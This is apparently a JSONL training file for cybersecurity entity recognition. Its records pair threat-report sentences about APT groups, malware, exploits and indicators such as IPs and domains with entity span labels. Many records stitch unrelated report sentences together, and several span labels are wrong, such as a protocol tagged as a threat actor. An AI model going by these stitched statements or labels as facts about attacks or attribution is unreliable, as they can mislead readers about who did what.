{"text": "sepolicy-inject_arm 2019-01-08 04:55:00 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 sepolicy-inject_arm64 2019-01-08 04:55:00 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a sepolicy-inject_i686 2019-01-08 04:55:00 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 In August 2018 , Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER . However , the attacker can easily create new accounts and update the malicious files in order to still work . LIGHTWORK ( filename : OT_T855_IEC104_GR.exe ) ( MD5 : 7b6678a1c0000344f4faf975c0cfc43d ) is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": {"ORGANIZATION: Unit 42": [[335, 342]], "THREAT_ACTOR: OilRig": [[352, 358]], "ORGANIZATION: government organization": [[371, 394]], "TOOL: BONDUPDATER": [[474, 485]], "TOOL: LIGHTWORK": [[598, 607]]}, "info": {"id": "cyberner_stix_train_005336", "source": "cyberner_stix_train"}}
{"text": "This method is design to bypass the automatic Google Play protection mechanism called Bouncer . If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . In 2012 , the Molerats attacks appeared to rely heavily on the XtremeRAT , a freely available tool that is popular with attackers based in the Middle East .", "spans": {"SYSTEM: Google Play": [[46, 57]], "SYSTEM: Bouncer": [[86, 93]], "TOOL: PingCastle MS17-010": [[167, 186]], "VULNERABILITY: EternalBlue": [[314, 325]], "MALWARE: XtremeRAT": [[428, 437]], "THREAT_ACTOR: attackers": [[485, 494]]}, "info": {"id": "cyberner_stix_train_005337", "source": "cyberner_stix_train"}}
{"text": "Following a network compromise , the threat actors typically delete their tools and processes .", "spans": {}, "info": {"id": "cyberner_stix_train_005338", "source": "cyberner_stix_train"}}
{"text": "TUESDAY , APRIL 9 , 2019 Gustuff banking botnet targets Australia EXECUTIVE SUMMARY Cisco Talos has uncovered a new Android-based campaign targeting Australian financial institutions . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . This DLL is stored in the launcher’s resources and compressed with LZMA . Does your organization support the U.S. Military An example would be supply chain management or manufacturing of parts that could be used by the military WarDefense", "spans": {"MALWARE: Gustuff": [[25, 32]], "ORGANIZATION: Cisco Talos": [[84, 95]], "SYSTEM: Android-based": [[116, 129]], "TOOL: PIVY": [[185, 189], [451, 455]], "ORGANIZATION: chemical makers": [[263, 278]], "ORGANIZATION: government agencies": [[281, 300]], "ORGANIZATION: defense contractors": [[303, 322]], "THREAT_ACTOR: attackers": [[393, 402]], "VULNERABILITY: zero-day vulnerability": [[410, 432]], "TOOL: DLL": [[471, 474]], "TOOL: LZMA": [[533, 537]], "ORGANIZATION: supply chain management": [[609, 632]], "ORGANIZATION: manufacturing": [[636, 649]], "ORGANIZATION: military WarDefense": [[685, 704]]}, "info": {"id": "cyberner_stix_train_005339", "source": "cyberner_stix_train"}}
{"text": "Package Name SHA256 digest SHA1 certificate com.network.android 98ca5f94638768e7b58889bb5df4584bf5b6af56b188da48c10a02648791b30c 516f8f516cc0fd8db53785a48c0a86554f75c3ba com.network.android 5353212b70aa096d918e4eb6b49eb5ad8f59d9bec02d089e88802c01e707c3a1 Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research . Winnti : bugcheck.xigncodeservice.com 167.99.106.49 , 178.128.180.206 DigitalOcean . In September , the Department of the Treasury issued an advisory strongly discouraging consumers and organizations from making payments based on extortion attempts and encouraging them to strengthen their defense measures .", "spans": {"THREAT_ACTOR: APT40": [[269, 274]], "ORGANIZATION: universities": [[339, 351]], "THREAT_ACTOR: Winnti": [[380, 386]], "DOMAIN: bugcheck.xigncodeservice.com": [[389, 417]], "IP_ADDRESS: 167.99.106.49": [[418, 431]], "IP_ADDRESS: 178.128.180.206": [[434, 449]], "ORGANIZATION: DigitalOcean": [[450, 462]], "ORGANIZATION: Department of the Treasury": [[484, 510]]}, "info": {"id": "cyberner_stix_train_005340", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //mailsa-wqq [ . The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . With regard to detection, several methods can be used to identify this type of C2 . During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": {"THREAT_ACTOR: espionage group": [[34, 49]], "ORGANIZATION: Department of Homeland Security": [[80, 111]], "ORGANIZATION: DHS": [[114, 117]], "ORGANIZATION: FBI": [[162, 165]], "ORGANIZATION: military": [[309, 317]], "ORGANIZATION: government": [[322, 332]], "TOOL: C2": [[450, 452]], "THREAT_ACTOR: Winnti group": [[492, 504]], "MALWARE: previously unreported malware samples": [[522, 559]], "MALWARE: malware arsenal": [[605, 620]], "SYSTEM: registered domains": [[636, 654]]}, "info": {"id": "cyberner_stix_train_005341", "source": "cyberner_stix_train"}}
{"text": "Trend Micro researchers found a new variant that uses a different way to lure users . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . test5.hta 80.82.67.42 . Would you click on the links in the email , even if it came from an address you did nt recognize If you have old vacation pictures on Facebook , a determined hacker could use them to write such an email , and cyber criminals are starting to use that kind of information to craft targets specifically for their victims .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "ORGANIZATION: FireEye": [[99, 106]], "THREAT_ACTOR: attackers": [[113, 122]], "VULNERABILITY: Microsoft Office vulnerabilities": [[190, 222]], "TOOL: LOWBALL": [[273, 280]], "FILEPATH: test5.hta": [[283, 292]], "IP_ADDRESS: 80.82.67.42": [[293, 304]], "THREAT_ACTOR: cyber criminals": [[516, 531]]}, "info": {"id": "cyberner_stix_train_005342", "source": "cyberner_stix_train"}}
{"text": "Dvmap : the first Android malware with code injection 08 JUN 2017 In April 2017 we started observing new rooting malware being distributed through the Google Play Store . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . The attached file , Reserva Advogados Associados.docx ( Attorneys Associates Reservation.docx ) , is a malicious Word file that drops a remote OLE object via template injection to execute macro code . Though few details are currently available about CVE-2023 - 37450 , Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content .", "spans": {"MALWARE: Dvmap": [[0, 5]], "SYSTEM: Android": [[18, 25]], "SYSTEM: Google Play Store": [[151, 168]], "VULNERABILITY: Niteris exploit": [[216, 231]], "ORGANIZATION: banks": [[274, 279]], "FILEPATH: Reserva Advogados Associados.docx": [[406, 439]], "FILEPATH: Attorneys Associates Reservation.docx": [[442, 479]], "TOOL: OLE": [[529, 532]], "VULNERABILITY: CVE-2023 - 37450": [[636, 652]]}, "info": {"id": "cyberner_stix_train_005343", "source": "cyberner_stix_train"}}
{"text": "We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute ’s self-described mission and other public information .", "spans": {"ORGANIZATION: CNIIHM": [[14, 20]], "MALWARE: TRITON": [[98, 104]]}, "info": {"id": "cyberner_stix_train_005345", "source": "cyberner_stix_train"}}
{"text": "In this example , the server response contains several values for Thai carriers . To compromise the utility , Kaspersky Lab determined that Barium used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code . The ZxShell service is installed as usual , and the in-execution dropper is deleted permanently using the special handle value 0x22222222 for the WriteFile API call . Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed .", "spans": {"ORGANIZATION: Kaspersky Lab": [[110, 123]], "MALWARE: ZxShell": [[308, 315]], "MALWARE: Ransomware builders": [[471, 490]]}, "info": {"id": "cyberner_stix_train_005346", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : 208.115.242.38 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 208.115.242.38": [[10, 24]]}, "info": {"id": "cyberner_stix_train_005347", "source": "cyberner_stix_train"}}
{"text": "The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates . this SWC was used to specifically target Turkish goverment .", "spans": {"THREAT_ACTOR: PassCV group": [[4, 16]]}, "info": {"id": "cyberner_stix_train_005348", "source": "cyberner_stix_train"}}
{"text": ") The RCSAndroid code can be considered one of the most professionally developed and sophisticated Android malware ever exposed . BRONZE BUTLER compromises organizations to conduct cyberespionage , primarily focusing on Japan . For brevity I will quickly cover some key points to understand the algorithm at a high level . When the victim opened an archive , a second stage dropper executed and a WAV file played like a real voicemail .", "spans": {"MALWARE: RCSAndroid": [[6, 16]], "SYSTEM: Android": [[99, 106]], "THREAT_ACTOR: BRONZE BUTLER": [[130, 143]], "THREAT_ACTOR: cyberespionage": [[181, 195]]}, "info": {"id": "cyberner_stix_train_005349", "source": "cyberner_stix_train"}}
{"text": "public passive DNS data , in 2017 was used to host the domain server1cs.exodus.connexxa.it . For more in-depth analysis of TRITON and other cyber threats , consider subscribing to FireEye Cyber Threat Intelligence . Specifically , it looks for antivirus and other security products . Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": {"TOOL: TRITON": [[123, 129]], "ORGANIZATION: FireEye Cyber Threat Intelligence": [[180, 213]], "THREAT_ACTOR: Dukes": [[303, 308]]}, "info": {"id": "cyberner_stix_train_005350", "source": "cyberner_stix_train"}}
{"text": "When presented with TG-4127 's spoofed login page , victims might be convinced it was the legitimate login page for their hillaryclinton.com email account .", "spans": {"THREAT_ACTOR: TG-4127": [[20, 27]], "DOMAIN: hillaryclinton.com": [[122, 140]], "TOOL: email": [[141, 146]]}, "info": {"id": "cyberner_stix_train_005351", "source": "cyberner_stix_train"}}
{"text": "This most recent FakeSpy campaign appears to target users of postal services around the world . Over the past three months , Recorded Future’s Insikt Group has observed an increase in APT33’s also known as Elfin infrastructure building and targeting activity , and on June 21 , 2019 , Yahoo . Periodically , researchers at Palo Alto Networks hunt through WildFire execution reports , using AutoFocus , to identify untagged samples ' artifacts in the hopes of identifying previously undiscovered malware families , behaviors , and campaigns .", "spans": {"MALWARE: FakeSpy": [[17, 24]], "ORGANIZATION: Recorded Future’s": [[125, 142]], "THREAT_ACTOR: APT33’s": [[184, 191]], "THREAT_ACTOR: Elfin": [[206, 211]], "ORGANIZATION: Palo Alto Networks": [[323, 341]], "ORGANIZATION: WildFire": [[355, 363]]}, "info": {"id": "cyberner_stix_train_005352", "source": "cyberner_stix_train"}}
{"text": "the C : path , save it to the file in json format and zip it nggstart_screen nggstop_screen Enable/disable screenshot module . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . The group has been active since at least 2008 and has targeted the restaurant , gaming , and hotel industries .", "spans": {"TOOL: SDK": [[131, 134]], "MALWARE: SWAnalytics": [[143, 154]], "ORGANIZATION: Tencent MyApp": [[270, 283]], "ORGANIZATION: Wandoujia": [[286, 295]], "ORGANIZATION: Huawei App Store": [[298, 314]], "ORGANIZATION: Xiaomi App Store": [[321, 337]]}, "info": {"id": "cyberner_stix_train_005353", "source": "cyberner_stix_train"}}
{"text": "Standard Encryption Frequently , Bread apps take advantage of standard crypto libraries in ` java.util.crypto ` . The group uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities . Execute Run a program in the remote host . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": {"TOOL: CVE software vulnerabilities": [[293, 321]], "THREAT_ACTOR: The actor": [[367, 376]], "ORGANIZATION: governmental organizations": [[438, 464]], "ORGANIZATION: political groups": [[467, 483]], "ORGANIZATION: think tanks": [[488, 499]], "ORGANIZATION: various individuals involved in defense and geopolitical related research": [[513, 586]]}, "info": {"id": "cyberner_stix_train_005354", "source": "cyberner_stix_train"}}
{"text": "They represent features and can be turned on and off from the command-and-control ( C & C ) server or by an SMS message , effectively instructing the malware to execute certain tasks . Ploutus-D will load KXCashDispenserLib” library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals .", "spans": {"MALWARE: Ploutus-D": [[185, 194]], "THREAT_ACTOR: HELIX KITTEN": [[363, 375]], "ORGANIZATION: aerospace": [[486, 495]], "ORGANIZATION: energy": [[498, 504]], "ORGANIZATION: financial": [[507, 516]], "ORGANIZATION: government": [[519, 529]], "ORGANIZATION: hospitality": [[532, 543]], "ORGANIZATION: telecommunications business": [[548, 575]]}, "info": {"id": "cyberner_stix_train_005355", "source": "cyberner_stix_train"}}
{"text": "As shown within the timeline above , the WINDSHIFT activity observed by Unit 42 falls between January and May of 2018 . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"ORGANIZATION: Unit 42": [[72, 79]], "TOOL: emails": [[148, 154]], "TOOL: Flash": [[160, 165], [252, 257]], "MALWARE: Daserf": [[212, 218]], "MALWARE: malware": [[219, 226]], "VULNERABILITY: exploits": [[258, 266]]}, "info": {"id": "cyberner_stix_train_005356", "source": "cyberner_stix_train"}}
{"text": "These files were most likely delivered via spear phishing emails to lure employees into unwittingly launching the malicious payload .", "spans": {"TOOL: emails": [[58, 64]]}, "info": {"id": "cyberner_stix_train_005357", "source": "cyberner_stix_train"}}
{"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": {"MALWARE: Silence.Main Trojan": [[4, 23]], "MALWARE: Clayslide": [[153, 162]], "FILEPATH: OfficeServicesStatus.vbs file": [[182, 211]], "MALWARE: ISMAgent Clayslide document": [[225, 252]]}, "info": {"id": "cyberner_stix_train_005358", "source": "cyberner_stix_train"}}
{"text": "The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges .", "spans": {"TOOL: Wi-Fi networks": [[42, 56]], "THREAT_ACTOR: NetBIOS Name Service": [[84, 104]]}, "info": {"id": "cyberner_stix_train_005359", "source": "cyberner_stix_train"}}
{"text": "http : //www.himobilephone [ . While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials .", "spans": {"ORGANIZATION: Secureworks": [[70, 81]], "THREAT_ACTOR: BRONZE BUTLER": [[113, 126]], "VULNERABILITY: CVE-2016-7836": [[193, 206]], "THREAT_ACTOR: Seedworm": [[293, 301]], "MALWARE: LaZagne": [[338, 345]], "MALWARE: Crackmapexec": [[350, 362]], "SYSTEM: Windows": [[373, 380]]}, "info": {"id": "cyberner_stix_train_005360", "source": "cyberner_stix_train"}}
{"text": "It opens the service thread of the service process and uses the ZwQueueApcThread native API to inject an APC . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) . In addition to Denes and Remy backdoors , at least two different communication modules were observed with different versions of this launcher – DNSProvider and HTTPProv . The ThreatConnect Platform also offers workflows and lowcode automation to automate the analysis and response process of reported emails .", "spans": {"THREAT_ACTOR: hacking group": [[122, 135]], "THREAT_ACTOR: Ajax Security": [[151, 164]], "THREAT_ACTOR: Flying Kitten": [[180, 193]], "ORGANIZATION: CrowdStrike": [[199, 210]], "ORGANIZATION: dissidents": [[265, 275]], "MALWARE: Denes": [[358, 363]], "MALWARE: Remy backdoors": [[368, 382]], "TOOL: DNSProvider": [[487, 498]], "TOOL: HTTPProv": [[503, 511]], "TOOL: ThreatConnect Platform": [[518, 540]]}, "info": {"id": "cyberner_stix_train_005361", "source": "cyberner_stix_train"}}
{"text": "The C2 S-TOOL server responds using the same format and serialization/encryption/encoding .", "spans": {"TOOL: C2 S-TOOL server": [[4, 20]]}, "info": {"id": "cyberner_stix_train_005362", "source": "cyberner_stix_train"}}
{"text": "This malware is responsible for decrypting the WFC.cfg file in the same folder with a hardcoded 20-byte XOR key .", "spans": {"FILEPATH: WFC.cfg": [[47, 54]]}, "info": {"id": "cyberner_stix_train_005363", "source": "cyberner_stix_train"}}
{"text": "US intelligence agencies pinned the breach on North Korea ( one of the hacking group 's demands was that Sony pull The Interview , Seth Rogan 's comedy about a plot to assassinate Kim Jong-Un ) . The spear-phishing infection vector is still the most popular ACT to initiate targeted campaigns .", "spans": {"ORGANIZATION: intelligence agencies": [[3, 24]], "ORGANIZATION: Sony": [[105, 109]]}, "info": {"id": "cyberner_stix_train_005364", "source": "cyberner_stix_train"}}
{"text": "Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments .", "spans": {"MALWARE: Zebrocy": [[0, 7]], "ORGANIZATION: Microsoft": [[75, 84]], "ORGANIZATION: Office": [[85, 91]]}, "info": {"id": "cyberner_stix_train_005365", "source": "cyberner_stix_train"}}
{"text": "This report details some of the technical findings of the Lazarus Group’s malware , observed by Novetta during Operation Blockbuster . In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke .", "spans": {"THREAT_ACTOR: Lazarus": [[58, 65]], "ORGANIZATION: Novetta": [[96, 103]], "ORGANIZATION: Operation Blockbuster": [[111, 132]], "ORGANIZATION: Group-IB": [[145, 153]], "TOOL: PowerShell": [[194, 204]], "FILEPATH: Ivoke": [[219, 224]]}, "info": {"id": "cyberner_stix_train_005366", "source": "cyberner_stix_train"}}
{"text": "Windows Defender ATP timeline can pinpoint the service DLL side-loading trick ( in this example , using fltlib.dll ) . The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets . If the names differ , the malware will simply exit without touching the payload . If you receive such an email , just delete it and do n’t give it a second thought .", "spans": {"SYSTEM: Windows Defender ATP": [[0, 20]], "TOOL: Mia Ash": [[134, 141]], "THREAT_ACTOR: threat actors": [[199, 212]]}, "info": {"id": "cyberner_stix_train_005367", "source": "cyberner_stix_train"}}
{"text": "The malware uses the function sendAll to send messages that spread the malware to other devices . We also observed Emissary Panda uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before . In this report , we present the historical intelligence we have gathered on the Ke3chang campaign , as well as an in-depth assessment of the ongoing Syrian-themed attacks against these MFAs .", "spans": {"THREAT_ACTOR: Emissary Panda": [[115, 129]]}, "info": {"id": "cyberner_stix_train_005368", "source": "cyberner_stix_train"}}
{"text": "By using access to additional computers through the currently logged on user or cracked passwords through dumped hashes , the attackers then began traversing the network infecting additional computers .", "spans": {}, "info": {"id": "cyberner_stix_train_005369", "source": "cyberner_stix_train"}}
{"text": "The Sogu gang use a custom developed threat – Backdoor.Sogu , whereas the group described in this document use an off the shelf threat – Poison Ivy .", "spans": {"ORGANIZATION: Sogu": [[4, 8]], "FILEPATH: Backdoor.Sogu": [[46, 59]], "MALWARE: Poison Ivy": [[137, 147]]}, "info": {"id": "cyberner_stix_train_005370", "source": "cyberner_stix_train"}}
{"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": {"ORGANIZATION: banks": [[38, 43]], "TOOL: Emotet": [[162, 168]], "TOOL: emails": [[294, 300]], "ORGANIZATION: government officials": [[315, 335]], "FILEPATH: malicious Microsoft Word document": [[377, 410]], "VULNERABILITY: CVE-2012-0158": [[430, 443]]}, "info": {"id": "cyberner_stix_train_005371", "source": "cyberner_stix_train"}}
{"text": "] ponethus [ . These operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of KeyBoy . As long as these actors regularly achieve their objective ( stealing sensitive data ) , they are not motivated to update or rethink their techniques , tactics , or procedures ( TTPs ) . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": {"TOOL: email lures": [[57, 68]], "TOOL: KeyBoy": [[146, 152]], "ORGANIZATION: Malwarebytes 's EDR": [[341, 360]], "MALWARE: NetSupport RAT": [[422, 436]]}, "info": {"id": "cyberner_stix_train_005372", "source": "cyberner_stix_train"}}
{"text": "The first known Suckfly campaign began in April of 2014 .", "spans": {"THREAT_ACTOR: Suckfly": [[16, 23]]}, "info": {"id": "cyberner_stix_train_005373", "source": "cyberner_stix_train"}}
{"text": "Critically however , the first sample of the OnionDuke dropper , which we have observed being used only with components of this toolset , was compiled on the 17th of February 2013 .", "spans": {"MALWARE: OnionDuke": [[45, 54]]}, "info": {"id": "cyberner_stix_train_005374", "source": "cyberner_stix_train"}}
{"text": "In another instance , APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . The documents that exploit CVE-2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]], "VULNERABILITY: exploit": [[212, 219]], "VULNERABILITY: CVE-2017-11882": [[220, 234]], "TOOL: HTML Application": [[265, 281]], "TOOL: HTA": [[284, 287]], "TOOL: Visual Basic": [[314, 326]], "TOOL: VBS": [[329, 332]], "FILEPATH: mshta.exe": [[417, 426]]}, "info": {"id": "cyberner_stix_train_005375", "source": "cyberner_stix_train"}}
{"text": "The last sample discussed may be malware-0 or at least part of the overall development and subsequent deployment of tools used to install Shamoon on Saudi systems .", "spans": {"MALWARE: Shamoon": [[138, 145]], "TOOL: Saudi": [[149, 154]]}, "info": {"id": "cyberner_stix_train_005376", "source": "cyberner_stix_train"}}
{"text": "This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications . We observed the attacker targeting both Windows and Mac OS X in the same spam mail on June 9 , 2017 .", "spans": {"THREAT_ACTOR: threat group": [[5, 17]], "ORGANIZATION: financial": [[91, 100]], "ORGANIZATION: government": [[103, 113]], "ORGANIZATION: energy": [[116, 122]], "ORGANIZATION: chemical": [[125, 133]], "ORGANIZATION: telecommunications": [[140, 158]], "SYSTEM: Windows": [[201, 208]], "SYSTEM: Mac OS X": [[213, 221]]}, "info": {"id": "cyberner_stix_train_005377", "source": "cyberner_stix_train"}}
{"text": "HawkEye is a versatile Trojan used by diverse actors for multiple purposes . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": {"TOOL: HawkEye": [[0, 7]], "THREAT_ACTOR: actors": [[46, 52]], "THREAT_ACTOR: operators": [[113, 122]], "THREAT_ACTOR: APT28": [[130, 135]], "ORGANIZATION: citizens": [[163, 171], [175, 183]]}, "info": {"id": "cyberner_stix_train_005378", "source": "cyberner_stix_train"}}
{"text": "Traps blocks the Sofacy delivery documents and the SofacyCarberp payload .", "spans": {"THREAT_ACTOR: Sofacy": [[17, 23]], "MALWARE: SofacyCarberp": [[51, 64]]}, "info": {"id": "cyberner_stix_train_005379", "source": "cyberner_stix_train"}}
{"text": "The configuration file is loaded from the same directory as the module and is expected to have a name “ NvCpld.dat “ .", "spans": {"FILEPATH: NvCpld.dat": [[104, 114]]}, "info": {"id": "cyberner_stix_train_005380", "source": "cyberner_stix_train"}}
{"text": "6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a .", "spans": {"FILEPATH: 6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a": [[0, 64]]}, "info": {"id": "cyberner_stix_train_005381", "source": "cyberner_stix_train"}}
{"text": "In this case , FrozenCell has primarily netted the actors behind it with recorded outbound calls followed closely by images and recorded incoming calls . The malicious samples we found are the early stage malware most often delivered by spear-phishing e-mails . APT1 intruders often use the FQDNs that are associated with legitimate websites hosted by their hop points . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": {"MALWARE: FrozenCell": [[15, 25]], "THREAT_ACTOR: APT1": [[262, 266]], "TOOL: FQDNs": [[291, 296]], "ORGANIZATION: Google": [[378, 384]]}, "info": {"id": "cyberner_stix_train_005382", "source": "cyberner_stix_train"}}
{"text": "We look at how these activity groups introduce the implant to various targets and techniques used by Microsoft researchers to track the implant .", "spans": {"ORGANIZATION: Microsoft": [[101, 110]]}, "info": {"id": "cyberner_stix_train_005383", "source": "cyberner_stix_train"}}
{"text": "changeActivity : This command will set up the webview to overlay any of the target activities . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network . KHRAT : Compile Date and Time : 2018-05-02 05:22:23 PM . It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": {"ORGANIZATION: DeepSight Managed Adversary and Threat Intelligence": [[112, 163]], "ORGANIZATION: MATI": [[166, 170]], "MALWARE: Backdoor.Powemuddy": [[206, 224]], "THREAT_ACTOR: Seedworm": [[243, 251]], "MALWARE: Powermud backdoor": [[255, 272]], "TOOL: POWERSTATS": [[279, 289]], "THREAT_ACTOR: group": [[326, 331], [402, 407]], "MALWARE: KHRAT": [[489, 494]], "THREAT_ACTOR: Harrison": [[595, 603]]}, "info": {"id": "cyberner_stix_train_005384", "source": "cyberner_stix_train"}}
{"text": "The Sofacy group also leveraged the recent Lion Air disaster as a lure in one of these attacks , which continues to show a willingness to use current events in their social engineering themes .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]]}, "info": {"id": "cyberner_stix_train_005385", "source": "cyberner_stix_train"}}
{"text": "The app then continues to run in the background without the user ’ s knowledge . The initial indicator of the attack was a malicious web shell that was detected on an IIS server , coming out of the w3wp.exe process . An explanation could be the fact that the campaign was very limited nature , which does not arouse suspicion .", "spans": {"MALWARE: w3wp.exe": [[198, 206]]}, "info": {"id": "cyberner_stix_train_005386", "source": "cyberner_stix_train"}}
{"text": "The TRITON malware contained the capability to communicate with Triconex SIS controllers . Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"TOOL: TRITON malware": [[4, 18]], "FILEPATH: Documents": [[91, 100]], "TOOL: flash": [[110, 115]], "VULNERABILITY: exploit": [[116, 123], [185, 192]], "TOOL: VirusTotal": [[196, 206]]}, "info": {"id": "cyberner_stix_train_005387", "source": "cyberner_stix_train"}}
{"text": "Country selection The administration console screenshots also show the ability to filter the results by country . For example , PwC UK has observed APT10 compiling DLLs out of tools , such as Mimikatz and PwDump6 , and using legitimate , signed software , such as Windows Defender to load the malicious payloads . We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack . COSMICENERGY ’s capabilities and overall attack strategy appear reminiscent of the , which issued IEC-104 ON / OFF commands to interact with RTUs and , according to one , may have made use of an MSSQL server as a conduit system to access OT .", "spans": {"ORGANIZATION: PwC UK": [[128, 134]], "THREAT_ACTOR: APT10": [[148, 153]], "TOOL: Mimikatz": [[192, 200]], "TOOL: PwDump6": [[205, 212]], "TOOL: signed software": [[238, 253]], "MALWARE: COSMICENERGY ’s": [[417, 432]], "SYSTEM: MSSQL server": [[612, 624]]}, "info": {"id": "cyberner_stix_train_005388", "source": "cyberner_stix_train"}}
{"text": "And , of course , remember to always be wary of unsolicited , unusual text messages and installing apps from third-party sources on your Android smartphone . In this instance , Symantec identified the specific PowerShell commands used by Gallmaker as being suspicious , leading to the discovery of this new campaign . After the modification , Akamai notes that they identified multiple compromised websites that had similarities .", "spans": {"SYSTEM: Android smartphone": [[137, 155]], "ORGANIZATION: Symantec": [[177, 185]], "TOOL: PowerShell commands": [[210, 229]], "THREAT_ACTOR: Gallmaker": [[238, 247]], "ORGANIZATION: Akamai": [[343, 349]]}, "info": {"id": "cyberner_stix_train_005389", "source": "cyberner_stix_train"}}
{"text": "The short URL redirects to the application page at Google Play . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 . However , numerous Ursnif variants were hosted on the bevendbrec.com site during this campaign . Now , consider a cyber threat detection system that takes a comprehensive and holistic approach to analyzing user behavior and computing interactions .", "spans": {"SYSTEM: Google Play": [[51, 62]], "THREAT_ACTOR: APT32": [[143, 148]], "ORGANIZATION: governments": [[175, 186]], "ORGANIZATION: dissidents": [[211, 221]], "ORGANIZATION: journalists": [[226, 237]], "MALWARE: Ursnif": [[279, 285]], "DOMAIN: bevendbrec.com": [[314, 328]]}, "info": {"id": "cyberner_stix_train_005390", "source": "cyberner_stix_train"}}
